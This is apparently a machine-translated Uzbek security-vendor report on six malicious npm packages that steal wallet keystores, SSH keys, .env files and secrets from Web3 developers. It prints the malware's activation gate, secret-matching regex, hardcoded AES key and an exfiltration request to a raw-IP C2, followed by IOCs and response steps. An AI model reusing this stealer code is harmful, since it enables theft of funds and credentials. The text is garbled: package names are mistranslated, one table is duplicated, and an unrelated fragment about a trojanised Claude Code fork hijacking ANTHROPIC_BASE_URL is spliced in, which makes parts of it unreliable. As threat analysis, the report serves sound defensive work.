TP; DR
2026-yil 6-may kuni bitta npm nashriyotchisi, namikazesarada010206, Ethereum, Solidity va DeFi ishlab chiquvchilar ekotizimiga qaratilgan oltita zararli paketni tarqatdi.
Paketlar, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utilsva web3-utils-core, mashhur Web3 vositalari uchun yordamchi kutubxonalarga o'xshab ko'rinishga mo'ljallangan ishonchli nomlardan foydalangan.
Oltita paketning barchasida bir xil narsa bor edi telemetry.js fayl. Fayl klaster bo'ylab bayt jihatidan bir xil edi, SHA-256 bilan:
Zararli dastur o'rnatish vaqtida ishga tushmaydi. Yo'q preinstall or postinstall Buning o'rniga, u paket import qilinganda faollashadi require().
Bu tafsilot muhim.
Implant ishlab chiquvchi paketdan haqiqatan ham foydalanguncha kutadi. Keyin u ish stantsiyasining haqiqiy Ethereum / Solidity ishlab chiqish muhitiga o'xshashligini tekshiradi. U Alchemy yoki Infura kalitlarini, shaxsiy kalitlarni, mnemonikalarni, tarqatuvchi kalitlarni yoki mahalliy Foundry katalogini qidiradi.
Agar xost mos kelsa, o'g'irlovchi SSH shaxsiy kalitlarini, Foundry / Geth / Brownie hamyon kalit do'konlarini to'playdi, .env* fayllar va sezgir muhit o'zgaruvchilari. U paketni qattiq kodlangan parol yordamida AES-256-GCM bilan shifrlaydi va TLS tekshiruvi o'chirilgan holda uni xom IPv4 C2 so'nggi nuqtasiga chiqaradi.
Xygeni’ning zararli dasturlarni erta ogohlantirish (MEW) tizimi oltita paketning barchasini zararli deb tasdiqladi. npm registrini olib tashlash hisoboti toʻplami kutilmoqda.
Klaster: Oltita paket, bitta nashriyotchi
Nashriyotchi hisobi namikazesarada010206 tasdiqlanmagan Gmail manziliga bog'langan edi namikazesarada010206@gmail.com.
Kampaniya 2026-yil 6-may kuni bir kunlik nashr sifatida paydo bo'ldi. Oltita paketning barchasi quyidagicha versiyalangan edi 1.0.0, ish vaqtiga bog'liqlik yo'q edi va faqat uchta faylni jo'natdi:
package.json index.js telemetry.js Ular shuningdek, bir xil manba omborini e'lon qilishdi:
https://github.com/harunosakura030303-maker/evmchain-config Dastlabki uchta paket MEW skanerlari tomonidan birinchi nashrda aniqlandi. Qolgan uchtasi nashriyotchining npm profilini tahlilchilar tomonidan ko'rib chiqilgandan so'ng majburiy ravishda belgilandi. Bir marta bir xil bayt-bir xil telemetry.js klaster bo'ylab tasdiqlangan bo'lsa-da, ular izchillik bilan zararli deb yopildi.
| To'plam | Version | npm nashr etildi | MEW chiptasi | hukm |
|---|---|---|---|---|
| viem-yadrosi | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Zararli |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | Zararli |
| hardhat-core-utils | 1.0.0 | 2026-05-06 | #51051 | Zararli |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | Yomon niyatli, izchillik bilan |
| quyish ustaxonalari | 1.0.0 | 2026-05-06 | #51071 | Yomon niyatli, izchillik bilan |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | Yomon niyatli, izchillik bilan |
Nomlash strategiyasi sodda, ammo samarali.
Bu paketlar aniq yuqori oqim nomlarini taqlid qilmaydi. Buning o'rniga ular ishonchli "foydali" qo'shimchalaridan foydalanadilar, masalan, -core, -utilsva -utils-coreBu ularni ishlab chiquvchi Web3 vositalari yonida ko'rishni kutadigan hamroh kutubxonalarga o'xshatadi.
| Zararli paket | Qonuniy nishon |
|---|---|
| viem-yadrosi | viem, mashhur Ethereum TypeScript mijozi |
| viem-utils-core | viem |
| hardhat-core-utils | qattiq shlyapa, asosiy oqimdagi Solidity ishlab chiqish muhiti |
| evm-utils | Umumiy EVM asboblar maydoni |
| quyish ustaxonalari | quyish sexi, Solidity asboblar zanjiri |
| web3-utils-core | web3-utils, Web3.js yordamchilari |
Bu "qo'shimcha paket" naqshidir: "Men haqiqiy paketman" emas, balki "Men haqiqiy paket atrofida oqilona yordamchiga o'xshayman".
Tez harakatlanayotgan DeFi ishlab chiquvchilari uchun bu xavf tug'dirish uchun yetarli.
Paket import qilinganda nima bo'ladi
Hujum zanjiri kichik, qasddan tuzilgan va kripto-ishlab chiqish muhitlariga qaratilgan.
O'rnatish ilgagi yo'q. Buning o'rniga, har bir paket quyidagilarni o'z ichiga oladi index.js stub funksiyasini eksport qiladi va keyin zararli telemetriya modulini yuklaydi.
require('./telemetry').init(); Bu shuni anglatadiki, zararli dastur birinchi importda faollashadi.
Bu tajovuzkor uchun operatsion jihatdan foydalidir. Ko'pgina skanerlar va sinov muhitlari o'rnatish vaqtidagi xatti-harakatlarga e'tibor qaratadi. Ushbu paket aslida ishlab chiquvchi, tuzish skripti, sinov to'plami yoki ish vaqti yo'li tomonidan ishlatilguncha kutadi.
Faollashtirish darvozasi: Faqat haqiqiy Web3 dasturchi ish stantsiyalarida o't oching
Implantning eng muhim qismi aktivatsiya eshigi hisoblanadi.
Zararli dastur Ethereum / Solidity ishlab chiquvchi mashinalarida keng tarqalgan muhit o'zgaruvchilarini tekshiradi:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Shuningdek, u Foundry o'rnatilgan ko'rinadi yoki yo'qligini tekshiradi:
fs.existsSync(path.join(os.homedir(), '.foundry')) Agar ikkala shart ham to'g'ri bo'lmasa, funksiya qaytadi va hech narsa qilmaydi.
Bu umumiy tahlil muhitida paketni jimroq qiladi. Foundry, Alchemy kalitlari, Infura kalitlari, shaxsiy kalitlar yoki mnemonikalarsiz sinov muhiti zararsiz ko'rinishga ega bo'lishi mumkin.
Mos keladigan xostda zararli dastur ma'lumotlarni to'plashdan oldin 60 dan 90 soniyagacha kutadi:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Kechikish import va ekfiltratsiya o'rtasidagi aniq bog'liqlikni kamaytiradi. .unref() call shuningdek, agar paket qisqa muddatli skriptda import qilingan bo'lsa, xost jarayonining normal ishlashiga imkon beradi.
Bu shovqinli tarzda "urish va tortib olish" harakati emas. Bu ishlab chiquvchi muhiti o'g'irlashga arziydigan bo'lmasa, ishga tushmaslik uchun mo'ljallangan maqsadli o'g'irlashdir.
O'g'ri nimani to'playdi
Aktivizatsiya eshigidan o'tgandan so'ng, zararli dastur Web3 ishlab chiqishda eng muhim manbalardan to'planadi: shaxsiy kalitlar, hamyon kalitlari do'konlari, joylashtirish ma'lumotlari, bulut sirlari, npm tokenlari va mahalliy loyiha konfiguratsiyasi.
| manba | Nima to'plangan |
|---|---|
| process.env | /TOKEN|SECRET|KEY|PASS|AVTORIZATSIYA|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ga mos keladigan har qanday o'zgaruvchi |
| ~/.ssh/* | PRIVATE KEY yoki BEGIN OPENSSH fayllari, jumladan, to'liq fayl mazmuni |
| ~/.quyma sexi/kalit do'konlari/* | Foundry hamyon kalit do'koni fayllari |
| ~/.ethereum/keystore/* | Geth hamyon kalit do'koni fayllari |
| ~/.braunie/akkauntlar/* | Brownie hamyon kalit do'koni fayllari |
| ${cwd}/.env | To'liq fayl mazmuni |
| ${cwd}/.env.local | To'liq fayl mazmuni |
| ${cwd}/.env.production | To'liq fayl mazmuni |
| ${cwd}/.env.development | To'liq fayl mazmuni |
| os.hostname() | Xost meta-fayllari |
| crypto.randomUUID() | Jabrlanuvchi/sessiya identifikatori |
| Sana.hozir() | To'plam vaqt tamg'asi |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA tokenlari quyidagilar:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Telemetriya operatorning o'z tahlili yoki alohida monetizatsiya qilingan kanal ekanligini tasdiqlay olmadik. Biz tekshirgan ikkala namunada ham ATTA tokenlari bir xil.
B klasteri: heibai
claude.hk OAuth фишинги + ANTHROPIC_BASE_URL Hijack
1-aprel namunasi kampaniyaning eng qo'pol, avvalgi qismidir.
heibai:2.1.88-claude.hk-4 tomonidan nashr etilgan wuguoqiangvip28, 2025-yil 7-iyunda yaratilgan akkaunt. Paket o'zini qonuniy versiyaga qarshi aniq ko'rsatdi. 2.1.88 Antropik ozod qilish.
Bu CA-certificate MITM bilan bog'liq emas. Buning o'rniga, u foydalanuvchiga OAuth so'nggi nuqtasi haqida yolg'on gapiradi.
Sirlangan Claude Code manbasining ustiga qo'yilgan zararli qo'shimchalar quyidagilarni o'z ichiga oladi:
| manba | Nima to'plangan |
|---|---|
| process.env | /TOKEN|SECRET|KEY|PASS|AVTORIZATSIYA|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ga mos keladigan har qanday o'zgaruvchi |
| ~/.ssh/* | PRIVATE KEY yoki BEGIN OPENSSH fayllari, jumladan, to'liq fayl mazmuni |
| ~/.quyma sexi/kalit do'konlari/* | Foundry hamyon kalit do'koni fayllari |
| ~/.ethereum/keystore/* | Geth hamyon kalit do'koni fayllari |
| ~/.braunie/akkauntlar/* | Brownie hamyon kalit do'koni fayllari |
| ${cwd}/.env | To'liq fayl mazmuni |
| ${cwd}/.env.local | To'liq fayl mazmuni |
| ${cwd}/.env.production | To'liq fayl mazmuni |
| ${cwd}/.env.development | To'liq fayl mazmuni |
| os.hostname() | Xost meta-fayllari |
| crypto.randomUUID() | Jabrlanuvchi/sessiya identifikatori |
| Sana.hozir() | To'plam vaqt tamg'asi |
Maqsadli ro'yxat juda aniq. Bu umumiy brauzer o'g'irlanishi yoki keng ko'lamli hisob ma'lumotlarini qirib olish emas. U Ethereum ilovalarini yaratadigan, sinovdan o'tkazadigan, joylashtiradigan yoki boshqaradigan dasturchilarga qaratilgan.
Foundry, Geth va Brownie kalit do'konlarini kiritish ayniqsa muhimdir. Ushbu fayllar hamyonlarga yoki joylashtirish identifikatorlariga to'g'ridan-to'g'ri kirishni anglatishi mumkin. Agar tajovuzkor ularni parollar, mnemonika yoki atrof-muhit sirlari bilan bog'lay olsa, ular mablag'larni ko'chirishi, joylashtirishchilarni taqlid qilishi yoki aqlli shartnoma operatsiyalarini buzishi mumkin.
Eksfiltratsiyadan oldin shifrlash
Zararli dastur to'plangan ma'lumotlarni yuborishdan oldin shifrlaydi.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Qattiq kodlangan parol:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Yakuniy yuklama JSON sifatida o'ralgan:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Shifrlash o'z-o'zidan zararli dasturni yanada rivojlantirmaydi. Biroq, bu tarmoq tekshiruvini qiyinlashtiradi. Chiqishni kuzatayotgan himoyachi JSON yuklamasini ko'radi, lekin o'g'irlangan kalitlarni, hamyon fayllarini yoki .env qattiq kodlangan parol va shifrni ochish mantig'isiz tarkib.
Xom IPv4 C2 ga eksfiltratsiya
Eksfiltratsiya yo'li qattiq kodlangan:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Zararli dastur ma'lumotlarni quyidagi manzilga yuboradi:
https://76.13.37.80:8443/api/v1/telemetry Ikkita tafsilot ajralib turadi.
Birinchidan, C2 domen emas, balki xom IPv4 manzilidir. Bu domenni ro'yxatdan o'tkazish zaruratini bartaraf etadi va domenga asoslangan ba'zi aniqlashlarning oldini oladi.
Ikkinchidan, TLS tekshiruvi quyidagilar bilan o'chirib qo'yilgan:
rejectUnauthorized: false Bu zararli dasturga o'z-o'zidan imzolangan sertifikatlarni ham qo'shib hisoblaganda, har qanday sertifikatni qabul qilish imkonini beradi. Boshqacha qilib aytganda, tajovuzkor haqiqiy ochiq sertifikatga ehtiyoj sezmasdan shifrlangan transportni oladi.
Qayta urinish mantig'i va zaxira xost yo'q. Xatolar jimgina yutib yuboriladi. Bu C2 oflayn yoki unga ulanib bo'lmaydigan bo'lsa, paketni jim saqlaydi.
Nima uchun bu kampaniya muhim
Ishlab chiquvchilarga qaratilgan zararli npm paketlarining aksariyati keng ko'lamli ma'lumotlarni ta'qib qiladi: npm tokenlari, AWS kalitlari, GitHub tokenlari yoki .npmrc fayllar.
Bu kampaniya maqsadni toraytiradi.
U mashinaning Ethereum yoki Solidity ishlab chiqaruvchisiga tegishli ekanligining belgilarini qidiradi. Keyin u aynan shu muhitda muhim bo'lgan aktivlarni oladi: hamyon kalit do'konlari, shaxsiy kalitlar, mnemonika, tarqatuvchi kalitlar, .env fayllar va SSH kalitlari.
Bu kampaniyani Web3 jamoalari uchun oddiy npm o'g'irlashdan ko'ra xavfliroq qiladi.
Muvaffaqiyatli infeksiya quyidagilarni keltirib chiqarishi mumkin:
- Joylashtirish hamyonlari
- Aqlli shartnoma boshqaruv kalitlari
- RPC provayder kalitlari
- Bulutni joylashtirish ma'lumotlari
- npm nashriyot tokenlari
- Ishlab chiquvchiga yoki infratuzilmani yaratishga SSH orqali kirish
- Loyiha sirlari saqlangan
.envfayllar - Foundry, Geth yoki Brownie uchun hamyon kalit do'konlari
Paket nomlari ham aniq ijtimoiy muhandislikni ko'rsatadi. Ular tanish vosita nomlari orqali Web3 ishlab chiquvchi ekotizimiga qaratilgan: viem, hardhat, foundry, evmva web3.
Aktyor haqiqiy loyihalardan voz kechishi shart emas. Ularga faqat o'rtacha darajadagi hamrohlik paketiga o'xshash narsani o'rnatish uchun dasturchi kerak.
Murosaga kelish va aniqlash ko'rsatkichlari
| Paketlar va nashriyotchi | |
|---|---|
| dala | qiymati |
| npm nashriyotchisi | namikazesarada010206 |
| Nashriyotchi elektron pochtasi | namikazesarada010206@gmail.com |
| elektron pochta tasdiqlandi | Yo'q |
| SCM tasdiqlangan | Yo'q |
| Obro'-e'tibor ballari | 1.0 |
| paketlar | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, dökümhane-utils, web3-utils-core |
| versiyalari | Barcha 1.0.0 |
| Manba ombori | https://github.com/harunosakura030303-maker/evmchain-config |
| Zararli ekanligi tasdiqlandi | Barcha oltita paket |
| tarmoq | |
|---|---|
| Shrift | qiymati |
| C2 tugash nuqtasi | https://76.13.37.80:8443/api/v1/telemetry |
| C2 IP | 76.13.37.80 |
| C2 porti | 8443/tsp |
| TLS xatti-harakati | rad etish Ruxsatsiz: noto'g'ri |
| Yuk ko'tarish sxemasi | {"v":2,"iv": "d": "t": } |
| Fayllar va xeshlar | |
|---|---|
| Shrift | qiymati |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Paket joylashuvi | package.json, index.js, telemetry.js |
| Fayllar soni | 3 |
| Taxminiy umumiy hajmi | 3.4 KB |
Faollashtirish signallari
Zararli dastur ushbu muhit o'zgaruvchilarini tekshiradi:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Shuningdek, u quyidagilarni tekshiradi:
~/.foundry/ Maqsadli xost yo'llari
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development To'plam Regex
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Aniqlash bo'yicha eslatmalar
To'liq xulq-atvor tahliliga ehtiyoj sezmasdan, bir nechta qoidalar ushbu kampaniyani ushlaydi.
Birinchidan, oltita zararli paket nomlari uchun qulflangan fayllarni skanerlang:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Har qanday moslik package-lock.json, yarn.lock, pnpm-lock.yamlyoki node_modules tarix jiddiy voqea sifatida qaralishi kerak.
Ikkinchidan, hamyon kalit do'koni yo'llarini o'qiydigan Node.js jarayonlarini kuzatib boring:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Bu yordamchi qaramlik sifatida import qilingan paket uchun kamdan-kam hollarda qonuniy xatti-harakatlardir. Bu, ayniqsa, chiquvchi tarmoq faoliyati kuzatilganda shubhali bo'ladi.
Uchinchidan, HTTPS ulanishlarini bloklash yoki ogohlantirish:
76.13.37.80:8443 Ayniqsa, so'rov yo'li quyidagicha bo'lsa:
/api/v1/telemetry To'rtinchidan, ushbu xususiyatlarni birlashtirgan npm paketlarini qidiring:
- Yangi yoki obro'si past bo'lgan nashriyotchi
- Tasdiqlanmagan Gmail hisobi
- Web3 qo'shni paket nomi
- Mazmunli ombor tarixi yo'q
- Kichik paket tartibi
index.jstelemetriya yoki yordamchi faylni yuklaydi- Ish vaqtiga bog'liqlik yo'q
- Sezgir muhit o'zgaruvchilari to'plami
- Hamyon kalit do'koniga kirish
Bu naqsh bitta IOCga qaraganda foydaliroq, chunki keyingi paket IP manzilini o'zgartirishi mumkin, ammo bir xil maqsadli mantiqni saqlab qoladi.
Kompromissga javob berish nazorat ro'yxati
Agar ishlab chiquvchi oltita paketdan birini ishlatgan bo'lsa va ularning muhiti faollashtirish eshigiga mos kelgan bo'lsa, ish stantsiyasini buzilgan deb hisoblang.
Bunga Foundry o'rnatilgan mashinalar, muhitdagi Alchemy yoki Infura kalitlari, shaxsiy kalitlar, mnemonika yoki tarqatuvchi kalitlari kiradi.
Tavsiya etilgan javob:
- Xostni tarmoqdan uzing.
- Saqlash
node_modules, qulflangan fayllar, qobiq tarixi va sud ekspertizasi uchun tegishli jurnallar. - Har bir SSH tugmachasini pastga aylantiring
~/.ssh/. - Har bir kalit do'koni uchun hamyon kalitlarini aylantiring
~/.foundry,~/.ethereumva~/.brownie. - Mablag'larni yangi hamyonlarga o'tkazing.
- Saqlangan har bir sirni aylantiring
.env*Ishlab chiquvchi ishlagan omborlardagi fayllar. - AWS kalitlari, npm tokenlari, joylashtirish tokenlari, API kalitlari, shaxsiy kalitlar, urug'lar va mnemonika kabi to'plam regexiga mos keladigan muhit sirlarini aylantiring.
- Paket birinchi marta o'rnatilgandan beri bulut, npm, GitHub, RPC provayderi va blokcheyn faoliyatini audit qilish.
- Qayta ishlatishdan oldin ish stantsiyasini qayta tasvirlang.
Himoyachilar nimani olib ketishlari kerak
Ushbu kampaniya npm typosquatting yuqori qiymatli ishlab chiquvchi ekotizimlari atrofida qanday rivojlanayotganini ko'rsatadi.
Aktyorga qat'iyat kerak emas edi. Ularga chalkashlik kerak emas edi. Ular hatto o'rnatish vaqtida bajarilishiga ham ehtiyoj sezmadilar.
Buning o'rniga ular uchta narsaga tayanishdi:
- Ishonchli Web3 paket nomlari
- Faqat haqiqiy kripto-ishlab chiqish mashinalarida faollashtirish
- Ethereum ishlab chiquvchilari uchun eng muhim bo'lgan fayllar va sirlarni to'g'ridan-to'g'ri o'g'irlash
Bu kampaniyani keng ko'lamli skanerlashda o'tkazib yuborishni osonlashtiradi va to'g'ri muhitga tushganda xavfli bo'ladi.
Web3 jamoalari uchun saboq aniq: qaramlik nomlarini tahdid modelingizning bir qismi sifatida ko'rib chiqing. Zararsiz yordamchiga o'xshagan paket baribir hamyonni buzishning eng qisqa yo'liga aylanishi mumkin.
npm registriga xabar berildi. Nashriyotchi hisobi va paketlar olib tashlanganida biz ushbu xabarni yangilaymiz.




